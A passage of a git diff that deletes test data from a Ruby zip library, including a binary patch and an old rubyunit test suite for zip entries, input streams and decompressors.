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
F{|Cm93OWD)

diff --git a/lib/zip/test/data/generated/empty.zip b/lib/zip/test/data/generated/empty.zip
deleted file mode 100644
index 15cb0ecb3e219d1701294bfdf0fe3f5cb5d208e7..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 22
NcmWIWW@Tf*000g10H*)|

diff --git a/lib/zip/test/data/generated/emptytestdir/.keep b/lib/zip/test/data/generated/emptytestdir/.keep
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/lib/zip/test/data/generated/longAscii.txt b/lib/zip/test/data/generated/longAscii.txt
deleted file mode 100644
index 91e1cc1ce0..0000000000
--- a/lib/zip/test/data/generated/longAscii.txt
+++ /dev/null
@@ -1,4512 +0,0 @@
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-require 'rubyunit'
-require 'zip'
-
-include Zip
-
-Dir.chdir "test"
-
-class AbstractInputStreamTest < RUNIT::TestCase
-  # AbstractInputStream subclass that provides a read method
-  
-  TEST_LINES = [ "Hello world#{$/}", 
-    "this is the second line#{$/}", 
-    "this is the last line"]
-  TEST_STRING = TEST_LINES.join
-  class TestAbstractInputStream 
-    include AbstractInputStream
-    def initialize(aString)
-      @contents = aString
-      @readPointer = 0
-    end
-
-    def read(charsToRead)
-      retVal=@contents[@readPointer, charsToRead]
-      @readPointer+=charsToRead
-      return retVal
-    end
-
-    def produceInput
-      read(100)
-    end
-
-    def inputFinished?
-      @contents[@readPointer] == nil
-    end
-  end
-
-  def setup
-    @io = TestAbstractInputStream.new(TEST_STRING)
-  end
-  
-  def test_gets
-    assert_equals(TEST_LINES[0], @io.gets)
-    assert_equals(TEST_LINES[1], @io.gets)
-    assert_equals(TEST_LINES[2], @io.gets)
-    assert_equals(nil, @io.gets)
-  end
-
-  def test_getsMultiCharSeperator
-    assert_equals("Hell", @io.gets("ll"))
-    assert_equals("o world#{$/}this is the second l", @io.gets("d l"))
-  end
-
-  def test_each_line
-    lineNumber=0
-    @io.each_line {
-      |line|
-      assert_equals(TEST_LINES[lineNumber], line)
-      lineNumber+=1
-    }
-  end
-
-  def test_readlines
-    assert_equals(TEST_LINES, @io.readlines)
-  end
-
-  def test_readline
-    test_gets
-    begin
-      @io.readline
-      fail "EOFError expected"
-      rescue EOFError
-    end
-  end
-end
-
-class ZipEntryTest < RUNIT::TestCase
-  TEST_ZIPFILE = "someZipFile.zip"
-  TEST_COMMENT = "a comment"
-  TEST_COMPRESSED_SIZE = 1234
-  TEST_CRC = 325324
-  TEST_EXTRA = "Some data here"
-  TEST_COMPRESSIONMETHOD = ZipEntry::DEFLATED
-  TEST_NAME = "entry name"
-  TEST_SIZE = 8432
-  TEST_ISDIRECTORY = false
-
-  def test_constructorAndGetters
-    entry = ZipEntry.new(TEST_ZIPFILE,
-       TEST_NAME,
-       TEST_COMMENT,
-       TEST_EXTRA,
-       TEST_COMPRESSED_SIZE,
-       TEST_CRC,
-       TEST_COMPRESSIONMETHOD,
-       TEST_SIZE)
-
-    assert_equals(TEST_COMMENT, entry.comment)
-    assert_equals(TEST_COMPRESSED_SIZE, entry.compressedSize)
-    assert_equals(TEST_CRC, entry.crc)
-    assert_equals(TEST_EXTRA, entry.extra)
-    assert_equals(TEST_COMPRESSIONMETHOD, entry.compressionMethod)
-    assert_equals(TEST_NAME, entry.name)
-    assert_equals(TEST_SIZE, entry.size)
-    assert_equals(TEST_ISDIRECTORY, entry.isDirectory)
-  end
-
-  def test_equality
-    entry1 = ZipEntry.new("file.zip", "name",  "isNotCompared", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry2 = ZipEntry.new("file.zip", "name",  "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry3 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extra", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry4 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 123, 1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry5 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  1234, 
-        ZipEntry::DEFLATED, 10000)  
-    entry6 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123, 
-        ZipEntry::DEFLATED, 10000)  
-    entry7 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   10000)  
-    entry8 = ZipEntry.new("file.zip", "name2", "isNotComparedXXX", 
-        "something extraXX", 12,  123,  
-        ZipEntry::STORED,   100000)  
-
-    assert_equals(entry1, entry1)
-    assert_equals(entry1, entry2)
-
-    assert(entry2 != entry3)
-    assert(entry3 != entry4)
-    assert(entry4 != entry5)
-    assert(entry5 != entry6)
-    assert(entry6 != entry7)
-    assert(entry7 != entry8)
-
-    assert(entry7 != "hello")
-    assert(entry7 != 12)
-  end
-end
-
-module IOizeString
-  attr_reader :tell
-  
-  def read(count = nil)
-    @tell ||= 0
-    count = size unless count
-    retVal = slice(@tell, count)
-    @tell += count
-    return retVal
-  end
-
-  def seek(index, offset)
-    @tell ||= 0
-    case offset
-    when IO::SEEK_END
-      newPos = size + index
-    when IO::SEEK_SET
-      newPos = index
-    when IO::SEEK_CUR
-      newPos = @tell + index
-    else
-      raise "Error in test method IOizeString::seek"
-    end
-    if (newPos < 0 || newPos >= size)
-      raise Errno::EINVAL
-    else
-      @tell=newPos
-    end
-  end
-
-  def reset
-    @tell = 0
-  end
-end
-
-class ZipLocalEntryTest < RUNIT::TestCase
-  def test_readLocalEntryHeaderOfFirstTestZipEntry
-    File.open(TestZipFile::TEST_ZIP3.zipName) {
-      |file|
-      entry = ZipEntry.readLocalEntry(file)
-      
-      assert_equal("", entry.comment)
-      # Differs from windows and unix because of CR LF
-      # assert_equal(480, entry.compressedSize)
-      # assert_equal(0x2a27930f, entry.crc)
-      # extra field is 21 bytes long
-      # probably contains some unix attrutes or something
-      # disabled: assert_equal(nil, entry.extra)
-      assert_equal(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equal(TestZipFile::TEST_ZIP3.entryNames[0], entry.name)
-      assert_equal(File.size(TestZipFile::TEST_ZIP3.entryNames[0]), entry.size)
-      assert(! entry.isDirectory)
-    }
-  end
-
-  def test_readLocalEntryFromNonZipFile
-    File.open("ziptest.rb") {
-      |file|
-      assert_equals(nil, ZipEntry.readLocalEntry(file))
-    }
-  end
-
-  def test_readLocalEntryFromTruncatedZipFile
-    zipFragment=""
-    File.open(TestZipFile::TEST_ZIP2.zipName) { |f| zipFragment = f.read(12) } # local header is at least 30 bytes
-    zipFragment.extend(IOizeString).reset
-    entry = ZipEntry.new
-    entry.readLocalEntry(zipFragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeEntry
-    entry = ZipEntry.new("file.zip", "entryName", "my little comment", 
-       "thisIsSomeExtraInformation", 100, 987654, 
-       ZipEntry::DEFLATED, 400)
-    writeToFile("localEntryHeader.bin", "centralEntryHeader.bin",  entry)
-    entryReadLocal, entryReadCentral = readFromFile("localEntryHeader.bin", "centralEntryHeader.bin")
-    compareLocalEntryHeaders(entry, entryReadLocal)
-    compareCDirEntryHeaders(entry, entryReadCentral)
-  end
-  
-  private
-  def compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.compressedSize   , entry2.compressedSize)
-    assert_equals(entry1.crc              , entry2.crc)
-    assert_equals(entry1.extra            , entry2.extra)
-    assert_equals(entry1.compressionMethod, entry2.compressionMethod)
-    assert_equals(entry1.name             , entry2.name)
-    assert_equals(entry1.size             , entry2.size)
-    assert_equals(entry1.localHeaderOffset, entry2.localHeaderOffset)
-  end
-
-  def compareCDirEntryHeaders(entry1, entry2)
-    compareLocalEntryHeaders(entry1, entry2)
-    assert_equals(entry1.comment, entry2.comment)
-  end
-
-  def writeToFile(localFileName, centralFileName, entry)
-    File.open(localFileName,   "wb") { |f| entry.writeLocalEntry(f) }
-    File.open(centralFileName, "wb") { |f| entry.writeCDirEntry(f)  }
-  end
-
-  def readFromFile(localFileName, centralFileName)
-    localEntry = nil
-    cdirEntry  = nil
-    File.open(localFileName,   "rb") { |f| localEntry = ZipEntry.readLocalEntry(f) }
-    File.open(centralFileName, "rb") { |f| cdirEntry  = ZipEntry.readCDirEntry(f) }
-    return [localEntry, cdirEntry]
-  end
-end
-
-
-module DecompressorTests
-  # expects @refText and @decompressor
-
-  def test_readEverything
-    assert_equals(@refText, @decompressor.read)
-  end
-    
-  def test_readInChunks
-    chunkSize = 5
-    while (decompressedChunk = @decompressor.read(chunkSize))
-      assert_equals(@refText.slice!(0, chunkSize), decompressedChunk)
-    end
-    assert_equals(0, @refText.size)
-  end
-end
-
-class InflaterTest < RUNIT::TestCase
-  include DecompressorTests
-
-  def setup
-    @file = File.new("file1.txt.deflatedData", "rb")
-    @refText=""
-    File.open("file1.txt") { |f| @refText = f.read }
-    @decompressor = Inflater.new(@file)
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
-
-class PassThruDecompressorTest < RUNIT::TestCase
-  include DecompressorTests
-  TEST_FILE="file1.txt"
-  def setup
-    @file = File.new(TEST_FILE)
-    @refText=""
-    File.open(TEST_FILE) { |f| @refText = f.read }
-    @decompressor = PassThruDecompressor.new(@file, File.size(TEST_FILE))
-  end
-
-  def teardown
-    @file.close
-  end
-end
-
- 
-module AssertEntry
-  def assertNextEntry(filename, zis)
-    assertEntry(filename, zis, zis.getNextEntry.name)
-  end
-
-  def assertEntry(filename, zis, entryName)
-    assert_equals(filename, entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  end
-
-  def assertEntryContentsForStream(filename, zis, entryName)
-    File.open(filename, "rb") {
-      |file|
-      expected = file.read
-      actual   = zis.read
-      if (expected != actual)
-  if (expected.length > 400 || actual.length > 400)
-    zipEntryFilename=entryName+".zipEntry"
-    File.open(zipEntryFilename, "wb") { |file| file << actual }
-    fail("File '#{filename}' is different from '#{zipEntryFilename}'")
-  else
-    assert_equals(expected, actual)
-  end
-      end
-    }
-  end
-
-  def AssertEntry.assertContents(filename, aString)
-    fileContents = ""
-    File.open(filename, "rb") { |f| fileContents = f.read }
-    if (fileContents != aString)
-      if (expected.length > 400 || actual.length > 400)
-  stringFile = filename + ".other"
-  File.open(stringFile, "wb") { |f| f << aString }
-  fail("File '#{filename}' is different from contents of string stored in '#{stringFile}'")
-      else
-  assert_equals(expected, actual)
-      end
-    end
-  end
-
-  def assertStreamContents(zis, testZipFile)
-    assert(zis != nil)
-    testZipFile.entryNames.each {
-      |entryName|
-      assertNextEntry(entryName, zis)
-    }
-    assert_equals(nil, zis.getNextEntry)
-  end
-
-  def assertTestZipContents(testZipFile)
-    ZipInputStream.open(testZipFile.zipName) {
-      |zis|
-      assertStreamContents(zis, testZipFile)
-    }
-  end
-
-  def assertEntryContents(zipFile, entryName, filename = entryName.to_s)
-    zis = zipFile.getInputStream(entryName)
-    assertEntryContentsForStream(filename, zis, entryName)
-  ensure 
-    zis.close if zis
-  end
-end
-
-
-
-class ZipInputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  def test_new
-    zis = ZipInputStream.new(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    zis.close    
-  end
-
-  def test_openWithBlock
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-    }
-  end
-
-  def test_openWithoutBlock
-    zis = ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName)
-    assertStreamContents(zis, TestZipFile::TEST_ZIP2)
-  end
-
-  def test_incompleteReads
-    ZipInputStream.open(TestZipFile::TEST_ZIP2.zipName) {
-      |zis|
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[0], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[1], entry.name)
-      assert_equals(0, entry.size)
-      assert_equals(nil, zis.gets)
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[2], entry.name)
-      assert zis.gets.length > 0
-      entry = zis.getNextEntry
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames[3], entry.name)
-      assert zis.gets.length > 0
-    }
-  end
-  
-end
-
-class TestFiles
-  RANDOM_ASCII_FILE1  = "randomAscii1.txt"
-  RANDOM_ASCII_FILE2  = "randomAscii2.txt"
-  RANDOM_ASCII_FILE3  = "randomAscii3.txt"
-  RANDOM_BINARY_FILE1 = "randomBinary1.bin"
-  RANDOM_BINARY_FILE2 = "randomBinary2.bin"
-
-  EMPTY_TEST_DIR      = "emptytestdir"
-
-  ASCII_TEST_FILES  = [ RANDOM_ASCII_FILE1, RANDOM_ASCII_FILE2, RANDOM_ASCII_FILE3 ] 
-  BINARY_TEST_FILES = [ RANDOM_BINARY_FILE1, RANDOM_BINARY_FILE2 ]
-  TEST_DIRECTORIES  = [ EMPTY_TEST_DIR ]
-  TEST_FILES        = [ ASCII_TEST_FILES, BINARY_TEST_FILES, EMPTY_TEST_DIR ].flatten!
-
-  def TestFiles.createTestFiles(recreate)
-    if (recreate || 
-  ! (TEST_FILES.inject(true) { |accum, element| accum && File.exists?(element) }))
-      
-      ASCII_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomAscii(filename, 1E4 * (index+1))
-      }
-      
-      BINARY_TEST_FILES.each_with_index { 
-  |filename, index| 
-  createRandomBinary(filename, 1E4 * (index+1))
-      }
-
-      ensureDir(EMPTY_TEST_DIR)
-    end
-  end
-
-  private
-  def TestFiles.createRandomAscii(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand
-      end
-    }
-  end
-
-  def TestFiles.createRandomBinary(filename, size)
-    File.open(filename, "wb") {
-      |file|
-      while (file.tell < size)
-  file << rand.to_a.pack("V")
-      end
-    }
-  end
-
-  def TestFiles.ensureDir(name) 
-    if File.exists?(name)
-      return if File.stat(name).directory?
-      File.delete(name)
-    end
-    Dir.mkdir(name)
-  end
-
-end
-
-# For representation and creation of
-# test data
-class TestZipFile
-  attr_accessor :zipName, :entryNames, :comment
-
-  def initialize(zipName, entryNames, comment = "")
-    @zipName=zipName
-    @entryNames=entryNames
-    @comment = comment
-  end
-
-  def TestZipFile.createTestZips(recreate)
-    files = Dir.entries(".")
-    if (recreate || 
-      ! (files.index(TEST_ZIP1.zipName) &&
-         files.index(TEST_ZIP2.zipName) &&
-         files.index(TEST_ZIP3.zipName) &&
-         files.index(TEST_ZIP4.zipName) &&
-         files.index("empty.txt")      &&
-         files.index("short.txt")      &&
-         files.index("longAscii.txt")  &&
-         files.index("longBinary.bin") ))
-      raise "failed to create test zip '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} ziptest.rb")
-      raise "failed to remove entry from '#{TEST_ZIP1.zipName}'" unless 
-  system("zip #{TEST_ZIP1.zipName} -d ziptest.rb")
-      
-      File.open("empty.txt", "w") {}
-      
-      File.open("short.txt", "w") { |file| file << "ABCDEF" }
-      ziptestTxt=""
-      File.open("ziptest.rb") { |file| ziptestTxt=file.read }
-      File.open("longAscii.txt", "w") {
-  |file|
-  while (file.tell < 1E5)
-    file << ziptestTxt
-  end
-      }
-      
-      testBinaryPattern=""
-      File.open("empty.zip") { |file| testBinaryPattern=file.read }
-      testBinaryPattern *= 4
-      
-      File.open("longBinary.bin", "wb") {
-  |file|
-  while (file.tell < 3E5)
-    file << testBinaryPattern << rand
-  end
-      }
